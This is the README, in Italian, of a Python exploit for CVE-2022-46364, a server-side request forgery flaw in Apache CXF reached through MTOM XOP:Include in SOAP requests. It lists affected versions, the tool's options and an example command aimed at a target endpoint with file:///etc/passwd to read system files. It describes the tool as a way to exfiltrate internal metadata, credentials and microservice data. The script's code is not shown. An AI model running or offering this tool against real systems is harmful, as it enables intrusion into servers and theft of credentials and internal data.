
# Exploit Python per CVE-2022-46364 (SSRF Apache CXF tramite MTOM XOP:Include) Invia richieste SOAP appositamente costruite per esfiltrare metadati interni, credenziali e dati di microservizi da endpoint vulnerabili.
Apache CXF SSRF tramite MTOM XOP:Include | CVSS 9.8 CRITICO
Apache CXF < 3.5.5 / < 3.4.10 consente Server-Side Request Forgery tramite attributi href XOP:Include non validati nelle richieste SOAP codificate in MTOM.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - Endpoint SOAP CXF vulnerabile (obbligatorio)-s, --ssrf-url - URL interno da esfiltrare (obbligatorio)-d, --domain - Dominio di destinazione (predefinito: localhost)--plain-soap - Usa SOAP semplice invece di MTOM# Legge /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com